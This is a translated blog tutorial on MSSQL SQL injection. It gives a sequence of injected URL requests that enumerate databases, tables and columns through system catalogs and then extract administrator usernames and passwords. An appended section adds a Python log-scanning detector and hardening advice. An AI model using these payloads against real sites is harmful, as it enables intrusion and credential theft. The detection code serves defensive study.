Source: Exploit's Blog
http://heijin.blogchina.com
I have seen a cross-database query article written by the meal. I sorted out the general steps, from exposing the databases to exposing the password, to make the ideas clearer.
SQL injection is flexible and the injected statements differ from case to case; the following are only the general steps. I hope they help you.
1: Expose all database names
http://www.***.com/***.asp?id=1 and 0 <> (Select Count (*)
From master.dbo.sysdatabases where name> 1 and dbid = 6)
Submit dbid = 7, 8, 9 ... to get more database names.
2: Expose the tables in a database
Assume that there is a BBS database, and submit the following statement:
http://www.***.com/jump.asp?id=1 and 0 <> (Select Top 1 Name
From bbs.dbo.sysObjects where xtype = 'u')
This returns a table name; assume it is admin.
Submit:
http://www.***.com/jump.asp?id=1 and 0 <> (Select Top 1 Name
From bbs.dbo.sysObjects where xtype = 'u' and name not in
('Admin'))
This returns the other tables.
3: Expose the fields in a table
Submit:
http://www.***.com/***.asp?id=1 and 0 <> (Select Count (*)
From bbs.dbo.sysobjects where xtype = 'u' and name = 'admin'
And Uid> (STR (ID)))
This returns the value of UID; assume it is 18779569. UID = ID.
Submit:
http://www.***.com/***.asp?id=1 and 0 <> (Select Top 1 Name
From bbs.dbo.syscolumns where id = 18779569)
This returns one field of admin; assume it is user_id.
Submit:
http://www.***.com/***.asp?id=1 and 0 <> (Select Top 1 Name
From bbs.dbo.syscolumns where id = 18779569 and name not in
('id', ...))
This exposes the other fields.
4: Expose the username, password, etc.
Suppose the fields are user_id, username, password, etc.
http://www.***.com/***.asp?id=1 and 0 <(Select User_id from
Bbs.dbo.admin Where username> 1)
This returns the username.
The password can be obtained in the same way.
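
For defenders: every request in the steps above puts non-numeric text into a numeric id parameter and names an MSSQL catalog table (sysdatabases, sysobjects, syscolumns). The following Python check is an added example, not code from the original post; it flags such requests in web server logs. The function names, the sample URLs and the assumption that id is always a short decimal integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Catalog tables queried in steps 1-3 of the post.
CATALOG = re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b", re.I)
# A parenthesised SELECT inside a parameter value.
SUBQUERY = re.compile(r"\(\s*select\b", re.I)
# Assumption: the application only ever expects a short decimal id.
NUMERIC = re.compile(r"[0-9]{1,10}")


def inspect(url, numeric_params=("id",)):
    """Return findings for one request URL; an empty list means clean."""
    findings = []
    # parse_qsl decodes %XX and '+', so encoded payloads are seen in clear.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = " ".join(value.split())  # collapse whitespace padding
        if name.lower() in numeric_params and not NUMERIC.fullmatch(text):
            findings.append(f"{name}: not a plain integer")
        for table in sorted({m.lower() for m in CATALOG.findall(text)}):
            findings.append(f"{name}: references {table}")
        if SUBQUERY.search(text):
            findings.append(f"{name}: embedded SELECT")
    return findings


def scan(urls):
    """Map each flagged URL to its findings, skipping clean requests."""
    return {u: f for u in urls if (f := inspect(u))}


# Constructed sample requests (not taken from any real log).
SAMPLE = [
    "/jump.asp?id=42",
    "/jump.asp?id=1+and+0%3C%3E(select+top+1+name+from+bbs.dbo.sysobjects+where+xtype=%27u%27)",
    "/list.asp?id=7&q=SysColumns",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE).items():
        print(url, findings)
```

The same integer check belongs in the application itself, in front of a parameterized query, and the web application's database login should have no rights on master or on other databases.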